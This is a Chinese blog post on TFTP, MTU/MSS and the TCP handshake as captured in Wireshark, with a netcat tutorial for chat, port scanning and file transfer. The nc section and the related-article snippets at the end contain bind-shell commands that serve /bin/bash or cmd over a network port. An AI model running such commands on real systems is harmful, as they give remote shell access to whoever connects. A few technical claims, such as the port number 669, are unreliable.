wireshark相关协议详解和nc命令建立对话

最新推荐文章于 2022-11-26 17:26:33 发布
最新推荐文章于 2022-11-26 17:26:33 发布
阅读量668 收藏
点赞数
分类专栏: linux 嵌入式 嵌入式-Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/andrewgithub/article/details/82918978
版权
linux 同时被 3 个专栏收录
128 篇文章 1 订阅
订阅专栏
嵌入式-Linux
91 篇文章 3 订阅
订阅专栏
嵌入式
66 篇文章 1 订阅
订阅专栏

TFTP简介:

  1. tftp简单的文件传输协议,用于实现误判系统引导、小文件传输、系统镜像升级引导等
  2. TFTP基于UDP协议设计(69)端口采用停止等待方式进行文件传输,采用超时重传机制进行重传
  3. TFTP将传输数据时将文件数据切割成块512字节方式传输,当最后一块不是512字节,则表示传输完成。
  4. TFTP支持ASCII码(文本,模式)和Octet(二进制模式)两种方式传输,可对文件进行读和写两种操作
    自己搭建TFTP服务器卡伊参考
    https://edu.51cto.com/course/2453.html
    陈鑫老师的课程
    在这里插入图片描述
    上图,图中1是一块,读块的开始。
    2是指明tftp的端口号是69
    对于TFTP服务器来说,要是只有一个与用户连接的话使用的是669号端口但是,当多个端口连接进来的时候,TFTP就会使用其他的高端口号进行连接,这是TFTP特殊的地方

下图中,一个读块的数据帧包括,1读数据请求,2源文件名字,类型是Octet二进制的形式进行传输。
在这里插入图片描述

其中用到了MSS和MTU:
MTU与MSS的区别:
mtu是网络传输最大报文包,mss是网络传输数据最大值。
mss加包头数据就等于mtu. 简单说拿TCP包做例子。 报文传输1400字节的数据的话,那么mss就是1400,再加上20字节IP包头,20字节tcp包头,那么mtu就是1400+20+20. 当然传输的时候其他的协议还要加些包头在前面,总之mtu就是总的最后发出去的报文大小。mss就是你需要发出去的数据大小。
1.MSS: Maxitum Segment Size 最大分段大小
2.MSS最大传输大小的缩写,是TCP协议里面的一个概念。
3.MSS就是TCP数据包每次能够传输的最大数据分段。为了达到最佳的传输效能TCP协议在建立连接的时候通常要协商双方的MSS值,这个值TCP协议在实现的时候往往用MTU值代替(需要减去IP数据包包头的大小20Bytes和TCP数据段的包头20Bytes)所以往往MSS为1460。通讯双方会根据双方提供的MSS值得最小值确定为这次连接的最大MSS值。

在这里插入图片描述

在这里插入图片描述

tcp中的序列号能够保证在进行是数据传输的过程中,客户端和服务器的交互不会被黑客使用欺骗手段欺骗,保证数据的安全。
在这里插入图片描述

在这里插入图片描述

采用wireshark抓包对上述过程进行说明:
从图中可以看出,第一个[SYN]包的信息是,客户端高数服务器我的端口是33162我想访问你的端口23,服务器回应[SYN,ACK]允许你访问端口23,我想访问你的端口33162,然后客户端回应[ACK]建立连接
在这里插入图片描述

下图中圈出的地方 push是紧急的意思:
在这里插入图片描述

在这里插入图片描述

NC命令

测试协议的时候若是没有数据抓包可一下linux上自己创造,比如使用:
nc 命令:
可以使用linux自带的nc命令进行聊天,再使用wireshark进行抓包;

    nc -l 1234 # Server 1
    nc 127.0.0.1 1234 # 127.0.0.1 换成 Server 1 的 IP 即可.

打开两个终端之后,就可以直接进行相互之间的通话了,想结束聊天可以使用^D (Ctrl + D)

扫描PORT看那个Port是开放的

    nc -v -w 2 localhost -z 30-80

        localhost [127.0.0.1] 80 (http) open
        localhost [127.0.0.1] 53 (domain) open

传送资料


    cat filename | nc -l 9090 # 通过 9090 port 传送 filename 的档案内容
    nc localhost 9090 # 接收 9090 port 传来档案内容

档案传送

    nc -l 1234 > filename # 接收 Server 先建立 (Port: 1234)
    nc 127.0.0.1 1234 < test.txt # 传送 Server 然后建立连接并产送档案的内容. (要j是使用的是其他的IP将127.0.0.1换成要使用的额IP)
    Server 端加密: nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
    Client 端解密: mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567

nc 与 telnet 连通

    nc -l 1234 # 建立 1234 port socket server
    telnet localhost 1234 # 連到 socket server
    # 再來互相打字, 都可以相互接收
    Server 直接打開一個 Shell: nc -l 1567 -e /bin/bash -i
    Client 連進來: nc 172.31.100.7 1567

nc 跑影音流


        Server: cat video.avi | nc -l 1567
        Client: nc localhost 1567 | mplayer -vo x11 -cache 3000 -
Achou.Wang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
nc传shell抓包-nc连接获取shell
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-14 943
nc传shell步骤1、渗透过程中免不了获取shell,可以通过nc工具连接,当然还有其他很多的工具,只不过nc默认安装在linux中,比较方便。 nc正向连接,防火墙不阻挡外来流量:客户端:nc -e cmd 192.168.0.18 4444 #主动连接客户端的4444端口 服务端:nc -lvvp 4444 #监听4444端口2、nc传shell抓包,nc反向连接,防火墙阻挡外部流量: 服务端:nc -l -p 4444 -t -e cmd.exe #-t通过telnet模式执行,可以省略
WireShark使用实例
_LsOutLook
04-13 520
首先更改两个虚拟机的网络连接方式 在Target机上,侦听333端口 nc -lp 333 -c bash 简单解释一下这条命令,在Target机上用侦听333端口,如果建立连接那么将Target机的shell传给主动建立连接的机器 在我的另一台机器中,启动wireshark开始抓包 在这台机器中,主动连接Target的333端口,命令如下: nc -nv 192.168.x.y...
《渗透测试实践指南 必知必会的工具与方法 (原书第2版)》读书摘录
Twistack 的博客
05-28 8739
----------------------------------------------------------------------------分割线------------------------------------------------------------------- 以下内容源自《渗透测试实践指南 必知必会的工具与方法 (原书第2版)》,属于读书摘录 --------
【计算机网络】 0、各网络命令 + tcpdump + Wireshark、抓包实战、TCP 握手挥手、防火墙、保活、MTU
呆呆的猫的博客
11-26 7343
tcpdump + Wireshark 抓包实战、TCP 握手挥手、防火墙、保活、MTU
在iphone、ipad上安装一些常用命令命令及实时抓取移动设备上的通信包(ADVsock2pipe+Wireshark+nc+tcpdump)
zhangmiaoping23的专栏
08-28 5661
相信对Linux、Unix比较熟悉的朋友,在iphone或 ipad越狱后发现通过Cydia可以安装OpenSSH,一定都想安装上并且通过ssh登录上去看看,但是登录后却发现几乎没几个命令可用,也就只有ls、cd等一些常用的命令,至于ifconfig、ping、netstat等都没有。。。 下面就来介绍一下如何让iphone或 ipad拥有Linux、Unix常用的命令。 1、首先你的ipho
谈谈PPPoE,PPTP和L2TP
04-13
通过实验和Wireshark抓包方式来分析PPPoE,PPTP和L2TP技术
man nc 中文版
继学先生
04-11 1079
(1) BSD 常规命令指南 名字: nc - 连接、监听任意的TCP和UDP。 概要: nc [-46DdhklnrStUuvzC] [-i 间隔] [-p 源端口] [-s 源IP地址] [-T 服务类型] [-w 超时时间] [-X 代理协议] [-x 代理
wireshark PPP分析
04-20
wireshark PPP协议分析,包括PPP握手,LCP,IPCP配置等
华为:ppp链路协商抓包分析(详细)
qq_47529104的博客
08-08 7570
首先简单说一下ppp配置的流程。 1、在服务端将链路的封装类型设置为ppp,在服务端创建用来验证的本地用户。(还有一些是用别的服务器存用户数据)。 2、在服务端上设置验证协议,比如pap或者chap 3、在客户端上同样将链路的封装类型配置为ppp。然后将向服务端提供用户信息,验证成功即可 简单来说就是上面的步骤 首先我们使用抓包软件先来看以下LCP,是如何建立链路的连接的。 华为的路由器在串线上默认使用的就是PPP协议,所以我们先看一下两台路由器使用串线连接之后,线路上的数据包。 当你连接
Wireshark分析协议数据包
10-11
1.包含IP、UDP 的报文格式和数据包协议,各个字段的含义。 2.包含TCP、ARP、ICMP、DNS 的报文格式和数据包协议,各个字段的含义、双方交互过程。 3.包含SMTP、HTTP的报文格式和数据包协议,各个字段的含义。
pptp,l2tp获取登录用户信息用pppd参数即可.docx
11-11
pptp,l2tp获取登录用户信息用pppd参数即可
wireshark-tshark 命令详解
04-02
wireshark - tshark 命令详细介绍,Ethereal是一个很流行的开源sniffer,支持包括solaris在内的很多平台。2006年初,主导Ethereal源码的大牛Gerald Combs跳槽到了CACE公司。原来“Ethereal”的商标就不能用了。伟大...
计算机网络原理实验报告---Wireshark实验:HTTP协议分析
01-20
使用Wireshark工具对自己电脑的WLAN端口进行抓包,分析其访问一个网站(如www.baidu.com)的过程及所使用的协议,并对HTTP客户请求报文和HTTP服务器响应报文格式进行分析。完成如下任务: 1. 给出HTTP请求报文和响应...
ssdp协议以太网报文,可以用wireshark软件打开
09-22
SSDP协议以太网报文,可以用wireshark软件打开,适用于学习SSDP报文解析,学习各种以太网协议可参考本人其他下载文件
网络通信协议中使用wireshark分析ping报文
03-14
网络通信协议中使用wireshark分析ping报文
wireshark抓包详解
热门推荐
AndrewYZWang的博客
09-11 3万+
过滤器: tcp src port 443 常用于过滤谷歌的浏览器端口443 1 2 2 2 2 2 2 2 2 界面操作: wireshark界面: Capture filter :选项 启用wireshark的混杂模式,只有勾选上这个选项才能,wireshark才能抓取非本地的包; 1.启用实时保存之后wireshark保存的地址; 2.文件保...
网络分层模型OSI和TCP/IP四层模型
AndrewYZWang的博客
08-12 1万+
网络分层模型OSI和TCP/IP四层模型 网络分层模型OSI和TCP/IP四层模型 OSI模型,即开放式通信系统互联参考模型(Open System Interconnection,OSI/RM,Open Systems Interconnection Reference Model),是国际标准化组织(ISO)提出的一个试图使各种计算机在世界范围内互连为网络的标准框架,简称OSI。...
linux线程随笔-pthread_create函数
AndrewYZWang的博客
08-18 1万+
函数简介   pthread_create是UNIX环境创建线程函数 头文件   #include&lt;pthread.h&gt; 函数声明   int pthread_create(pthread_t  *restrict tidp, const  pthread_attr_t  *restrict_attr,   void*(*start_rtn)(void*),   void  ...
lseek()函数详解
AndrewYZWang的博客
08-10 1万+
今日命令: df -k //查看磁盘的分区情况 andrew@andrew-Thurley:~/work/iotec$ df -k 文件系统 1K-块 已用 可用 已用% 挂载点 udev 2800604 0 2800604 0% /dev tmpfs 566068 837...
wireshark参数详解
最新发布
04-19
Wireshark是一款开源的网络协议分析工具,它可以用于捕获和分析网络数据包。下面是一些常用的Wireshark参数的详解: 1. -i:指定要捕获的网络接口。例如,-i eth0表示使用eth0接口进行数据包捕获。 2. -f:设置...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Achou.Wang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值